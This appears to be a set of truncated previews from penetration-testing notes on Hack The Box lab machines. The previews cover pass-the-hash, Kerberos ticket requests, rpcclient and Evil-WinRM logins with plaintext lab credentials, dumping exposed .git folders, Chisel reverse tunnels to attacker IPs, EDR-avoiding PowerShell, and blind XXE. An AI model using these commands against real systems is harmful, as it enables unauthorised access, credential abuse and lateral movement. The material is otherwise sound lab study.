Pass The Hash Attack The Pass the Hash (PtH) technique allows an attacker to authenticate to a remote system or service using a user’s NTLM hash instead of the associated plaintext password. Note t...

Unauthenticated If we get valid users we can try to request TGT tickets to authenticate as another user: Remember to add the name of the domain controller into the /etc/hosts for this command ...

Null Session rpcclient -U "" -N 10.10.10.10 Authenticated rpcclient -U "htb.local\amanda%Ashare1972" 10.10.10.103 Sizzle If an RPC console is prompted then you can execute following commands: En...

Githacker Command to extract the whole git project: githacker --url http://10.10.11.134/.git/ --output-folder results Examples: Epsilon Git Commits Command to list the commits under a git project...

Host entries 10.10.11.152 dc01.timelapse.htb timelapse.htb If Active Directory => NTP Synchronization with the domain controller. Content Kerberos enumeration RPC Enumeration SMB En...

Basic Access Evil-WinRM to access via port tcp-5985 into a system: evil-winrm -i 10.10.11.158 -u 'nikk37' -p 'get_dem_girls2@yahoo.com' Examples: [[Forest#^b22389]] Active Directory Certificate S...

Calling an operating system API from PowerShell is not completely straightforward. Fortunately, other researchers have presented a technique that simplifies the process and also helps avoid endpoin...

Login via PFX File: First we need to extract the key and the certificate from the pfx file: # Extracting the public certificate: openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out public...

Download Chisel Remote port forwarding Chisel as client: # Single Port .\\chisel.exe client 10.10.16.4:1337 R:1433:localhost:1433 # All the ports ./chisel client 10.10.14.3:1234 R:127.0.0.1:socks ...

Detection You can often detect blind XXE using the same technique as for XXE SSRF attacks but triggering the out-of-band network interaction to a system that you control. For example, you would def...